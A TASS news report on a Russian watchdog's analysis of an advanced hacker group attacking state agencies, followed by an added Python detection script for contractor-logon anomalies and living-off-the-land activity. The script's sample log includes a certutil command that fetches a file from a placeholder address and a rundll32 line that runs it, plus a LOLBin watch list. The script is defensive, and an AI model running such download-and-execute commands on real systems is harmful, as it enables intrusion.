
Hackers attacking Russian targets possess agency-grade resources — watchdog

The report, obtained by TASS, calls the hacker group the most advanced "cyber mercenaries that pursue interests of a foreign state"

MOSCOW, May 18. /TASS/. Hacker groups attacking Russian targets have the same grade of resources as foreign intelligence agencies, National Coordination Center for Computer Incidents Deputy Director Nikolai Murashov said Tuesday.

"Considering the complexity of means and methods used by the perpetrators, as well as the speed of their operation, we have reasons to believe that this group has resources of foreign intelligence agencies’ grade," Murashov said.

According to Murashov, the analysis of a series of computer attacks on Russian state agencies’ resources was carried out together with Rostelecom-Solar specialists.


The report notes that, when attacking Russian infrastructure, the group hosts its operations on Russia’s own cloud services (Yandex and Mail.ru clouds), so its traffic blends in with legitimate domestic use; it uses previously unseen malware, combines several attack techniques, and cannot be detected with standard security tools.

The attacks mostly aim to fully compromise the target’s IT infrastructure and steal confidential information (emails, shared and restricted-access files, infrastructure and logic diagrams, etc.). The attackers used phishing emails themed on the coronavirus pandemic, exploited vulnerabilities in web applications, and compromised subcontractors’ infrastructure.

"The information came from tender venues, public data on state procurements, published press releases and so on. The next step was hacking the service providers’ infrastructure, which allowed the perpetrators to legitimately log in to required infrastructures of federal agencies," the document says.

The hackers then attacked the workstations of IT administrators with high privilege levels. The group achieved a relatively high level of stealth by using legitimate system utilities (living off the land) and malware that standard tools did not detect. Once the infrastructure was fully compromised, the attackers began collecting information from every source of interest.
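The two behaviours the report describes, valid contractor credentials used to log in to agency systems and living-off-the-land tooling run on administrators' workstations, are exactly the ones that look legitimate to signature-based tools but stand out against a behavioural baseline. The following is an added detection sketch, not code from the report, TASS or Rostelecom-Solar; the log lines, account names, hostnames, addresses, service window and admin-host list are all constructed for the example.

```python
from datetime import datetime, timedelta

# ---- Constructed sample telemetry (not from the report) ----------------
# Fields: timestamp|event_type|host|user|source_ip|detail
SAMPLE_LOG = """\
2021-04-12T10:05:11|logon|fs-01.agency.local|svc-contractor-it|10.20.1.7|interactive
2021-04-13T02:14:09|logon|dc-01.agency.local|svc-contractor-it|198.51.100.23|interactive
2021-04-13T02:16:30|process|adm-ws-03.agency.local|admin.petrov|-|cmd.exe /c certutil -urlcache -split -f http://203.0.113.5/a.txt a.txt
2021-04-13T02:17:02|process|adm-ws-03.agency.local|admin.petrov|-|rundll32.exe a.txt,Start
2021-04-13T09:30:00|process|adm-ws-03.agency.local|admin.petrov|-|notepad.exe report.txt
2021-04-13T09:35:00|process|ws-112.agency.local|ivanova|-|certutil -hashfile setup.msi SHA256
"""

# Hypothetical baseline: each service-provider account's agreed service window
# (local hours, inclusive start, exclusive end) and its usual source addresses.
CONTRACTOR_BASELINE = {
    "svc-contractor-it": {"hours": (8, 19), "sources": {"10.20.1.7"}},
}
# Hypothetical list of high-privilege administrator workstations.
ADMIN_HOSTS = {"adm-ws-03.agency.local"}
# Windows binaries commonly abused for living off the land.
LOLBINS = {"certutil", "rundll32", "mshta", "regsvr32", "bitsadmin", "wmic", "msiexec"}


def parse_log(text):
    """Parse the pipe-separated sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, etype, host, user, src, detail = line.split("|", 5)
        events.append({"ts": datetime.fromisoformat(ts), "type": etype, "host": host,
                       "user": user, "src": src, "detail": detail})
    return events


def _binaries(cmdline):
    """Lowercased basenames (without .exe) of every token in a command line,
    so 'cmd.exe /c certutil ...' still exposes the certutil call."""
    names = set()
    for tok in cmdline.split():
        base = tok.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if base.endswith(".exe"):
            base = base[:-4]
        names.add(base)
    return names


def contractor_logon_anomalies(events, baseline=CONTRACTOR_BASELINE):
    """Valid credentials, but outside the service window or from an unknown source."""
    alerts = []
    for e in events:
        if e["type"] != "logon" or e["user"] not in baseline:
            continue
        b = baseline[e["user"]]
        reasons = []
        start, end = b["hours"]
        if not start <= e["ts"].hour < end:
            reasons.append("outside service window")
        if e["src"] not in b["sources"]:
            reasons.append(f"unknown source {e['src']}")
        if reasons:
            alerts.append({"rule": "contractor_logon", "ts": e["ts"], "host": e["host"],
                           "user": e["user"], "reason": "; ".join(reasons)})
    return alerts


def lolbin_on_admin_hosts(events, admin_hosts=ADMIN_HOSTS, lolbins=LOLBINS):
    """Living-off-the-land binaries launched on high-privilege admin workstations."""
    alerts = []
    for e in events:
        if e["type"] != "process" or e["host"] not in admin_hosts:
            continue
        hits = _binaries(e["detail"]) & lolbins
        if hits:
            alerts.append({"rule": "lolbin_admin_host", "ts": e["ts"], "host": e["host"],
                           "user": e["user"], "reason": f"{sorted(hits)}: {e['detail']}"})
    return alerts


def correlate(logon_alerts, lolbin_alerts, window=timedelta(hours=24)):
    """Pair each suspicious contractor logon with LOLBin activity that follows it
    within `window`: the provider-access-then-admin-workstation sequence."""
    chains = []
    for la in logon_alerts:
        followers = [pa for pa in lolbin_alerts if la["ts"] <= pa["ts"] <= la["ts"] + window]
        if followers:
            chains.append({"logon": la, "followed_by": followers})
    return chains


def run(text=SAMPLE_LOG):
    events = parse_log(text)
    logons = contractor_logon_anomalies(events)
    lolbins = lolbin_on_admin_hosts(events)
    return {"logons": logons, "lolbins": lolbins, "chains": correlate(logons, lolbins)}


if __name__ == "__main__":
    for kind, items in run().items():
        print(kind)
        for item in items:
            print("  ", item)
```

On the constructed sample the daytime contractor logon from the known address passes, the 02:14 logon from an unfamiliar address is flagged on both counts, the certutil download and rundll32 launch on the admin workstation are flagged, the routine certutil hash check on an ordinary user's machine is not, and the correlation step ties the anomalous logon to the admin-workstation activity that followed it. The point is that none of these events is malicious on its own signature; only the deviation from an agreed baseline reveals them.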